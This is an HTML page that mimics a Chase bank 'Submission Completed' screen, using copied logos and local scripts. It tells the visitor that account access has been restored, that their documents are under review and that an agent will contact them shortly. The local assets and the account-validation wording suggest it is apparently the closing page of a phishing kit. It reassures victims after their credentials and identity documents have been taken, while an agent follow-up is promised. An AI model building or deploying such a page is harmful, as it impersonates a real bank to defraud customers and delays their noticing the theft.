<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Submission Complete-Chase.com</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" 
            href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,
            wght@0,100..900;1,100..900&display=swap" rel="stylesheet">

    <link rel="icon" href="images/1000193120-removebg-preview.png" 
            type="image/png">
    <script src="https://kit.fontawesome.com/73be9fb684.js" crossorigin="anonymous"></script>
</head>
<body id="finish-page">
    <!-- header -->
    <div class="headercon">
        <div class="exitbuttoncon">
            <span class="exitinline">
                <i class="fa-solid fa-chevron-left whitechevon"></i>
                <button class="exitbutton" id="exitbuttonacccount">Exit</button>
            </span>
        </div>
        <div class="hederimageholder">
            <img src="images/white_chase_logo_innercircl-removebg-preview.png" alt="">
        </div>
        <div class="languagehlder">
            <button class="expaniol">Español</button>
        </div>
    </div>
        <!-- header stop-->

        <!-- body contents -->
    <div class="boycontainer">
            <!-- body left content -->
        <div class="leftflexdiv">
            <span class="questionspan">
                <i class="fa-regular fa-circle-question secureqestionicon"></i>
                <button class="qestion">Question?</button>
            </span>
            <div class="unexpecedspancon">
                <span class="Faqread">
                    <button class="FaQs">Read our FaQs</button>
                    <i class="fa-solid fa-chevron-right"></i>
                </span>
            </div>
        </div>
            <!-- body left content stop -->

            <!-- main body right content -->
        <div class="bodyrightcontents">
            
            <div class="nnertextcon">
                <div class="firsttextcon">
                    <p class="firsttext">Submission Completed</p>
                </div>
                <div class="loadingcon">
                    <div class="innerloaading documentloaddiv"></div>
                </div>
                    <p class="bodyheadertext">Account Validation.</p>
                    <p class="paragraph">
                        Thank you! Your chase account access has been Restored on this device.
                    </p>
                <!-- <p class="otpmessage">We sent you a text message</p> -->
                <div class="checkcon">

                    <div class="checkparent">
                        <i class="fa-solid fa-check checkchild"></i>
                    </div>

                    <p class="contactpara">Your documents are under review. Please stay available via email or message, as one of our agents will be in touch with you within a few minutes.</p>
                </div>
            </div>

                    

        </div>
            <!-- main body right content stop-->

    <script src="index.js" type="module"></script>
</body>
</html>